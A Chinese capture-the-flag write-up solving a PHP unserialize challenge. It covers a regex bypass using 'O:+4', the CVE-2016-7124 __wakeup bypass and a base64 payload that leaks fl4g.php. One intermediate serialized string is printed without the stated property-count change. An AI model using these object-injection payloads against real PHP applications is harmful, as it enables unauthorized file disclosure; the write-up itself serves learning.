Web_php_unserialize,XCTF-Web_php_unserialize

题目

题目如下  可以看出来这是一道关于反序列化的题目

分析题目

看一下题目的代码

首先判断GET参数 “var” 是否存在，然后通过base64解码传入变量var，如果不存在就输出网页源码对var进行一个正则过滤，如果通过正则过滤便会进行反序列化，否则响应信息’stop hacking!’

题目中出现的魔术方法

题目中存在一个demo类

__contrust() 见名知意，构造方法。具有构造方法的类会在每次创建新对象前调用此方法 ，该方法常用于完成一些初始化工作。__destruct() 析构方法 ，当 某个对象的所有引用都被删除或者当对象被显式销毁时 ， 析构函数会被执行。__wakeup() 是用在反序列化操作中。unserialize() 会检查存在一个 __wakeup() 方法。如果存在，则先会调用 __wakeup() 方法。 __wakeup() 经常用在反序列化操作中，例如重新建立数据库连接，或执行其它初始化操作。

解题思路

通过GET传入base64编码得参数且要绕过正则过滤绕过 __wakeup() 解释，源码中提示flag在 fl4g.php 中，而使用调用 __wakeup() 会强制将 $file 变量复制为index.php

开始解题

序列化

代码如下

class Demo {

private $file = 'index.php';

public function __construct($file) {

$this->file = $file;

}

function __destruct() {

echo @highlight_file($this->file, true);

}

function __wakeup() {

if ($this->file != 'index.php') {

//the secret is in the fl4g.php

$this->file = 'index.php';

}

}

}

$a = new Demo('fl4g.php');

$b = serialize($a);

echo $b;

?>

运行后结果如下

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

绕过正则

该题正则匹配的规则如下: 在不区分大小写的情况下 ， 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 ， 那么就被过滤。 我们传入得参数类型为对象 " O " ， 又因为序列化字符串的格式为 参数格式:参数名长度 ， 因此 " O:4 " 这样的字符串肯定无法通过正则匹配 这里利用了一个php反序列化的特性(感兴趣可以自行百度)，需要注意的是在php7中这部分代码被修改了，无法使用。

获取php版本

使用dirsearch进行扫描  可以找到泄露的PHP信息

利用特性

反序列化操作 参数格式:参数名长度 时，当格式为 参数格式:+参数名长度 会返回同样的结果，故我们可以通过这个方法绕过正则过滤

O:+4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

绕过__wakeup()

对应的CVE编号: CVE-2016-7124

存在漏洞的PHP版本: PHP5.6.25 之前版本和 7.0.10 之前的7.x版本漏洞概述: __wakeup() 魔法函数被绕过,导致执行了一些非预期效果的漏洞漏洞原理: 当对象的 属性(变量)数 大于实际的个数时, __wakeup() 魔法函数被绕过

故序列化结果修改如下

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

构造payload

题目中知道还需要进行base64编码 构造payload如下

?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

得到flag

注意点

需要注意的一点是private和protect属性的序列化

直接上代码

class test{

public $name="winny";

private $age="8";

protected $sex="female";

}

$a=new test();

$a=serialize($a);

print_r($a);

?>

序列化显示如下

O:4:"test":3:{s:4:"name";s:5:"winny";s:9:"testage";s:1:"8";s:6:"*sex";s:6:"female";}

private 分析： 这样就发现本来是 age结果上面出现的是 testage，而且 testage 长度为7，但是上面显示的是9 查找资料后发现 private 属性序列化的时候格式是 %00类名%00成员名，%00 占一个字节长度，所以 age 加了类名后变成了 testage 长度为9  protect 分析： 本来是 sex 结果上面出现的是 *sex，而且 *sex 的长度是4，但是上面显示的是6，同样查找资料后发现 protect属性序列化的时候格式是 %00*%00成员名

public(公共的):在本类内部、外部类、子类都可以访问 protect(受保护的):只有本类或子类或父类中可以访问 private(私人的):只有本类内部可以使用

这里我开始是采用手动序列化，一直没有成功。本菜狗还是使用脚本输出吧呜呜呜。